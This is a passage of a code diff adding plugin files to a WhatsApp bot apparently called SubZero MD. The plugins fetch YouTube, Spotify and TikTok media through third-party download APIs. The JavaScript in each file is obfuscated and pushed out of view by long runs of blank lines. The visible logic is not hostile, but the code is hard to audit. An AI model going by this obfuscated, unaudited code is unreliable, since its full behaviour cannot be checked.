_0xe2f6b0[_0x2e6af7(0x121)](_0x4938ec,{'video':{'url':_0x503033},'mimetype':_0x2e6af7(0x11a)},{'quoted':_0xc0bd08});}catch(_0x3da04a){console[_0x2e6af7(0x11f)](_0x3da04a),_0x290209('❌\x20An\x20error\x20occurred\x20while\x20processing\x20your\x20request.');}}),cmd({'pattern':_0x8fdd9b(0x11e),'alias':[_0x8fdd9b(0x102),_0x8fdd9b(0x117)],'react':'⏳','desc':_0x8fdd9b(0x105),'category':_0x8fdd9b(0x107),'use':'.playx\x20<keywords>','filename':__filename},async(_0x1014d1,_0x44f57d,_0x281123,{from:_0x22ebe3,args:_0x445711,reply:_0x377273})=>{const _0x552fd2=_0x8fdd9b;try{const _0x356223=_0x445711['join']('\x20');if(!_0x356223)return _0x377273(_0x552fd2(0x115));_0x377273(_0x552fd2(0xfe));const _0x271698=await yts(_0x356223);if(!_0x271698[_0x552fd2(0x111)]||_0x271698[_0x552fd2(0x111)][_0x552fd2(0x120)]===0x0)return _0x377273('❌\x20No\x20results\x20found\x20for\x20\x22'+_0x356223+'\x22.');const _0x4360a6=_0x271698[_0x552fd2(0x111)][0x0],_0x57ffbc=_0x4360a6[_0x552fd2(0xfb)],_0x3af9d4=_0x552fd2(0x106)+_0x57ffbc,_0x1d283c=await axios[_0x552fd2(0x103)](_0x3af9d4);if(!_0x1d283c[_0x552fd2(0xff)]['success'])return _0x377273('❌\x20Failed\x20to\x20fetch\x20audio\x20for\x20\x22'+_0x356223+'\x22.');const {download_url:_0x3a6e3b}=_0x1d283c[_0x552fd2(0xff)][_0x552fd2(0x112)];await _0x1014d1[_0x552fd2(0x121)](_0x22ebe3,{'audio':{'url':_0x3a6e3b},'mimetype':_0x552fd2(0x101),'ptt':![]},{'quoted':_0x44f57d});}catch(_0x274411){console[_0x552fd2(0x11f)](_0x274411),_0x377273(_0x552fd2(0xf9));}});
|
plugins/dl-play3.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x46ec51=_0x1299;(function(_0x1c046a,_0x51155d){const _0x40c04f=_0x1299,_0x373a9e=_0x1c046a();while(!![]){try{const _0x5c3d8b=parseInt(_0x40c04f(0x110))/0x1*(parseInt(_0x40c04f(0x109))/0x2)+-parseInt(_0x40c04f(0x115))/0x3+parseInt(_0x40c04f(0xfd))/0x4*(-parseInt(_0x40c04f(0x102))/0x5)+-parseInt(_0x40c04f(0xfb))/0x6*(parseInt(_0x40c04f(0x11d))/0x7)+parseInt(_0x40c04f(0x10f))/0x8+-parseInt(_0x40c04f(0x10c))/0x9*(-parseInt(_0x40c04f(0x111))/0xa)+parseInt(_0x40c04f(0x10a))/0xb*(parseInt(_0x40c04f(0x11c))/0xc);if(_0x5c3d8b===_0x51155d)break;else _0x373a9e['push'](_0x373a9e['shift']());}catch(_0x412806){_0x373a9e['push'](_0x373a9e['shift']());}}}(_0x8d2e,0xef6fd));function hi(){const _0x936e96=_0x1299;console[_0x936e96(0x100)](_0x936e96(0x107));}hi();function _0x1299(_0xdd8a4e,_0x1c9b48){const _0x8d2ed1=_0x8d2e();return _0x1299=function(_0x129952,_0x52d2aa){_0x129952=_0x129952-0xf6;let _0x47a4ec=_0x8d2ed1[_0x129952];return _0x47a4ec;},_0x1299(_0xdd8a4e,_0x1c9b48);}const {cmd,commands}=require('../command'),yts=require(_0x46ec51(0x113)),axios=require(_0x46ec51(0xf6));cmd({'pattern':'video3','alias':[_0x46ec51(0x10b),'ytv3','ytvideo3'],'react':'🔄','desc':_0x46ec51(0x106),'category':_0x46ec51(0x104),'use':'.vidx\x20<keywords>','filename':__filename},async(_0xd6d2a7,_0x52dd09,_0x274922,{from:_0x58af10,args:_0x30587b,reply:_0x1967fe})=>{const _0x39a82f=_0x46ec51;try{const _0x501cea=_0x30587b['join']('\x20');if(!_0x501cea)return _0x1967fe(_0x39a82f(0x117));_0x1967fe(_0x39a82f(0xf8));const _0x1ce220=await yts(_0x501cea);if(!_0x1ce220['videos']||_0x1ce220['videos']['length']===0x0)return _0x1967fe(_0x39a82f(0x108)+_0x501cea+'\x22.');const _0x26f941=_0x1ce220['videos'][0x0],_0x5920cf=_0x26f941[_0x39a82f(0xfe)],_0x2d1d85=_0x39a82f(0x101)+_0x5920cf,_0x4e01c1=await axios[_0x39a82f(0x119)](_0x2d1d85);if(!_0x4e01c1['data'][_0x39a82f(0xff)])return _0x1967fe(_0x39a82f(0x10e)+_0x501cea+'\x22.');const {download_url:_0x1b649b}=_0x4e01c1[_0x39a82f(0x120)][_0x39a82f(0x11a)];await _0xd6d2a7[_0x39a82f(0x112)](_0x58af10,{'video':{'url':_0x1b649b},'mimetype':_0x39a82f(0x116)},{'quoted':_0x52dd09});}catch(_0x2dd777){console[_0x39a82f(0x11b)](_0x2dd777),_0x1967fe(_0x39a82f(0x118));}}),cmd({'pattern':'play3','alias':[_0x46ec51(0xfc),'ytplay3'],'react':'🔄','desc':_0x46ec51(0x103),'category':_0x46ec51(0x114),'use':_0x46ec51(0xfa),'filename':__filename},async(_0x5ccd79,_0xea2e4a,_0x258b5e,{from:_0x440036,args:_0x45f6cb,reply:_0xd2fbaa})=>{const _0x4e24f9=_0x46ec51;try{const _0x316468=_0x45f6cb['join']('\x20');if(!_0x316468)return _0xd2fbaa(_0x4e24f9(0x105));_0xd2fbaa(_0x4e24f9(0xf9));const _0x2644f6=await yts(_0x316468);if(!_0x2644f6[_0x4e24f9(0x11f)]||_0x2644f6[_0x4e24f9(0x11f)][_0x4e24f9(0x121)]===0x0)return _0xd2fbaa('❌\x20No\x20results\x20found\x20for\x20\x22'+_0x316468+'\x22.');const _0x1381c4=_0x2644f6[_0x4e24f9(0x11f)][0x0],_0x4be45=_0x1381c4['url'],_0x21c154=_0x4e24f9(0xf7)+_0x4be45,_0x2e3133=await axios[_0x4e24f9(0x119)](_0x21c154);if(!_0x2e3133['data']['success'])return _0xd2fbaa(_0x4e24f9(0x10d)+_0x316468+'\x22.');const {download_url:_0x5e3552}=_0x2e3133['data'][_0x4e24f9(0x11a)];await _0x5ccd79['sendMessage'](_0x440036,{'audio':{'url':_0x5e3552},'mimetype':_0x4e24f9(0x11e),'ptt':![]},{'quoted':_0xea2e4a});}catch(_0x1c8cbd){console[_0x4e24f9(0x11b)](_0x1c8cbd),_0xd2fbaa(_0x4e24f9(0x118));}});function _0x8d2e(){const _0x5b0cd3=['452276qVVBoX','181460AErjqf','sendMessage','yt-search','music','2862843FHtjww','video/mp4','*Please\x20provide\x20a\x20video\x20tital\x20or\x20url*','❌\x20An\x20error\x20occurred\x20while\x20processing\x20your\x20request.','get','result','error','31403676pTkEOn','4375SnmLwX','audio/mp4','videos','data','length','axios','https://api.davidcyriltech.my.id/download/ytmp3?url=','>\x20©\x20SᴜʙZᴇʀᴏ\x20Sᴇɴᴅɪɴɢ\x20Yᴏᴜʀ\x20ᴠɪᴅᴇᴏ\x20Wᴀɪᴛ...\x20❄️','>\x20©\x20SᴜʙZᴇʀᴏ\x20Sᴇɴᴅɪɴɢ\x20Yᴏᴜʀ\x20Sᴏɴɢ\x20Wᴀɪᴛ...❄️','.playx\x20<keywords>','18498FRMNMP','song3','1790732Lxbxeg','url','success','log','https://api.davidcyriltech.my.id/youtube/mp3?url=','15rrlyHp','Download\x20audio\x20from\x20YouTube\x20by\x20searching\x20for\x20keywords.','video','*Please\x20provide\x20a\x20audio\x20tital\x20or\x20url*','Download\x20videos\x20from\x20YouTube\x20by\x20searching\x20for\x20keywords.','Hello\x20World!','❌\x20No\x20results\x20found\x20for\x20\x22','4YrvSuW','11EyHmRv','ytvid3','9ZFfKDN','❌\x20Failed\x20to\x20fetch\x20audio\x20for\x20\x22','❌\x20Failed\x20to\x20fetch\x20video\x20for\x20\x22','13322136xxWHFc'];_0x8d2e=function(){return _0x5b0cd3;};return _0x8d2e();}
|
plugins/dl-spotify.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const _0x38d117=_0x4078;function _0x4078(_0x531820,_0x2ca913){const _0x150716=_0x1507();return _0x4078=function(_0x40785d,_0xa8f5d8){_0x40785d=_0x40785d-0x17a;let _0x1ca1dd=_0x150716[_0x40785d];return _0x1ca1dd;},_0x4078(_0x531820,_0x2ca913);}(function(_0x39487e,_0x28155a){const _0x9177ab=_0x4078,_0x5cfd53=_0x39487e();while(!![]){try{const _0x2cca22=parseInt(_0x9177ab(0x192))/0x1+parseInt(_0x9177ab(0x188))/0x2+-parseInt(_0x9177ab(0x195))/0x3*(-parseInt(_0x9177ab(0x186))/0x4)+parseInt(_0x9177ab(0x191))/0x5+-parseInt(_0x9177ab(0x18b))/0x6*(parseInt(_0x9177ab(0x19f))/0x7)+parseInt(_0x9177ab(0x18f))/0x8+parseInt(_0x9177ab(0x17f))/0x9*(-parseInt(_0x9177ab(0x18d))/0xa);if(_0x2cca22===_0x28155a)break;else _0x5cfd53['push'](_0x5cfd53['shift']());}catch(_0x418f11){_0x5cfd53['push'](_0x5cfd53['shift']());}}}(_0x1507,0x8f1c6));function hi(){console['log']('Hello\x20World!');}function _0x1507(){const _0x1b3e9f=['```Gᴇɴᴇʀᴀᴛɪɴɢ\x20ʏᴏᴜʀ\x20sᴏɴɢ\x20🚀```','btch-downloader','Artist:\x20','stream','videos','error','message','data','7BRDjkn','Fetched\x20from\x20YouTube','No\x20suitable\x20YouTube\x20results\x20found.','https://spotifyapi.caliphdev.com/api/download/track?url=','ytmusic','music','headers','../command','153AqniWB','Fetch\x20audio\x20from\x20Spotify\x20or\x20YouTube','seconds','audio/mpeg','url','content-type','media','16MQXFQw','ERROR\x20:\x20Failed\x20to\x20fetch\x20audio\x20from\x20Spotify.','1116216REemcQ','title','spotify','3635238MTahxA','axios','1329850mVyDky','get','6045360aGncJD','sendMessage','5318815NdZENt','1014087DAFuHl','mp3','Please\x20provide\x20a\x20title\x20or\x20link\x20(Spotify/YouTube)!','45879iZzRbY','GET'];_0x1507=function(){return _0x1b3e9f;};return _0x1507();}hi();const axios=require(_0x38d117(0x18c)),yts=require('yt-search'),{youtube}=require(_0x38d117(0x198)),{cmd}=require(_0x38d117(0x17e));cmd({'pattern':_0x38d117(0x18a),'alias':[_0x38d117(0x17b),_0x38d117(0x17c)],'react':'🎵','desc':_0x38d117(0x180),'category':_0x38d117(0x185),'filename':__filename},async(_0x33522d,_0x4e7bf1,_0xe7be94,{from:_0x4f8bb1,quoted:_0x57d2f3,body:_0x1d3ba2,isCmd:_0x128ec4,command:_0x21ef67,args:_0x27202a,q:_0x3bbcc9,isGroup:_0x1c0166,sender:_0x53714e,senderNumber:_0x2f071c,botNumber:_0x491545,pushname:_0x3ab57c,reply:_0x3ce42b})=>{const _0x16a366=_0x38d117;if(!_0x3bbcc9)return _0x3ce42b(_0x16a366(0x194));_0x3ce42b(_0x16a366(0x197));try{const _0x123dbf=await axios[_0x16a366(0x18e)]('https://spotifyapi.caliphdev.com/api/search/tracks?q='+encodeURIComponent(_0x3bbcc9)),_0x5c8d48=_0x123dbf['data'][0x0];if(_0x5c8d48){const _0x6a333=await axios({'url':_0x16a366(0x17a)+encodeURIComponent(_0x5c8d48['url']),'method':_0x16a366(0x196),'responseType':_0x16a366(0x19a)});if(_0x6a333[_0x16a366(0x17d)][_0x16a366(0x184)]===_0x16a366(0x182)){await _0x33522d[_0x16a366(0x190)](_0x4f8bb1,{'audio':_0x6a333[_0x16a366(0x19e)],'mimetype':_0x16a366(0x182),'contextInfo':{'externalAdReply':{'title':_0x5c8d48[_0x16a366(0x189)],'body':_0x16a366(0x199)+_0x5c8d48['artist'],'mediaType':0x1,'sourceUrl':_0x5c8d48[_0x16a366(0x183)],'renderLargerThumbnail':!![]}}});return;}}}catch(_0x3dc897){console[_0x16a366(0x19c)]('Spotify\x20Error:',_0x3dc897[_0x16a366(0x19d)]);}try{const _0x43a66a=await yts(_0x3bbcc9),_0x89189c=_0x43a66a[_0x16a366(0x19b)][0x0];if(_0x89189c&&_0x89189c[_0x16a366(0x181)]<0xe10){const _0x5a06c1=await youtube(_0x89189c[_0x16a366(0x183)]);_0x5a06c1&&_0x5a06c1[_0x16a366(0x193)]?await _0x33522d[_0x16a366(0x190)](_0x4f8bb1,{'audio':{'url':_0x5a06c1[_0x16a366(0x193)]},'mimetype':_0x16a366(0x182),'contextInfo':{'externalAdReply':{'title':_0x89189c[_0x16a366(0x189)],'body':_0x16a366(0x1a0),'mediaType':0x1,'sourceUrl':_0x89189c[_0x16a366(0x183)],'renderLargerThumbnail':!![]}}}):_0x3ce42b(_0x16a366(0x187));}else _0x3ce42b(_0x16a366(0x1a1));}catch(_0x4ac2e2){console[_0x16a366(0x19c)]('Spotify\x20Error:',_0x4ac2e2[_0x16a366(0x19d)]);}});
|
plugins/dl-tiktok.js
ADDED
@@ -0,0 +1,217 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
